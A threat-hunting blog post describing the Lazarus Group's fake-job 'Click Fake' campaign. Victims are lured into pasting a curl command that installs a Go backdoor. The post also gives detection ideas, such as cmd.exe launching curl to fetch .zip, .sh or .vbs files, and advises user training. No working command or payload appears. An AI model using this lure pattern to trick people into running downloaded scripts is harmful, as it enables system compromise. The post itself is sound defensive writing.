RADICL Blog

Threat Hunters Corner: Too Good To Be True

Written by Josh Shepard | 2025 | 05

Welcome 

Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at Radicl, and in this episode, we’ll be diving into a recent campaign orchestrated by the North Korean threat actor Lazarus Group. In this campaign, Lazarus Group tricks a user into running a malicious script on their machine by having them apply for a job that is just a little too good to be true.

 

RADBot Generated Text Summary

Unmasking the Lazarus Group's Click Fake Campaign: A Deep Dive into Sophisticated Job Schemes

Hey everyone, Josh Shepherd here, Principal Threat Hunter at Radicl. Welcome to this edition of the Threat Hunters Corner. Today, we’re diving into a recent campaign orchestrated by the notorious Lazarus Group, a North Korean nation-state threat actor known for its dual focus on cyber espionage and e-crime. 

Who is the Lazarus Group? 

The Lazarus Group, backed by North Korea, engages in a variety of cyber activities ranging from traditional espionage to financially motivated cybercrimes. Their operations often aim to bolster North Korea's national defense budget through illicit means such as cryptocurrency theft and extortion campaigns.

The Click Fake Campaign 

The latest campaign, dubbed "Click Fake," exemplifies the group's sophisticated approach to social engineering. Here’s how it unfolds: 

  1. Target Identification: The Lazarus Group identifies potential victims through LinkedIn, focusing on individuals whose professional backgrounds align with the fabricated job opportunities they create. 
  2. Personalized Messaging: Victims receive highly personalized messages suggesting they are ideal candidates for a dream job, complete with attractive benefits and pay. 
  3. Realistic Job Application Process: Victims are directed to a convincing job application website where they undergo a comprehensive application process, including uploading resumes, answering demographic questions, and agreeing to terms and conditions. 
  4. Malicious Video and Microphone Check: The final step involves a video and microphone check, which inevitably fails. A pop-up then instructs the user to run a specific command. 

The Technical Breakdown 

The campaign targets both Windows and macOS users, adapting its approach based on the victim's operating system, as determined by the user agent string. 

  • Windows Users: Victims are prompted to press Windows + R, type CMD, and execute a curl command. This command downloads a .zip file that eventual leads to the installation of a backdoor written in Go, granting persistent access to the threat actor. 
  • macOS Users: Victims are instructed to open Terminal and run a similar curl command, which also results in the installation of a Go-based backdoor. 
The execution flow involves the following steps: 

  1. Curl Command Execution: The copied curl command reaches out to an adversary-controlled server to download a .zip file. 
  2. Script Execution: The .zip file contains a Bash script for macOS users and a VBS script for Windows users. These scripts then contact another command-and-control (C2) server to fetch the final Go backdoor payload. 

Detection and Prevention Strategies 

Detection

  1. Command Execution Monitoring: On Windows, create analytics to detect explorer.exe spawning a cmd.exe process that subsequently runs a curl command. This sequence is unusual for regular users and can indicate malicious activity. 
  2. Curl Command Analysis: Monitor for curl commands that download .zip, .sh, or .vbs files. While this may generate false positives, tuning these alerts to exclude legitimate IT or development activities can help identify suspicious behavior. 

Prevention 

  1. User Education: Educate users about evolving social engineering techniques. Emphasize the importance of skepticism, especially when asked to run scripts from unfamiliar websites. Encourage users to contact IT support if they encounter such requests. 
  2. Security Awareness Training: Incorporate specific warnings about job-related phishing schemes into your security awareness programs. Highlight the risks of executing commands or downloading files from untrusted sources. 

Conclusion

The Click Fake campaign by the Lazarus Group is a prime example of how sophisticated social engineering can be used to compromise systems. By understanding their tactics and implementing robust detection and prevention measures, organizations can better protect themselves against such threats.

If you have any questions or need further assistance, please feel free to reach out. Stay safe out there, and see you on the next edition of the Threat Hunters Corner.
View full post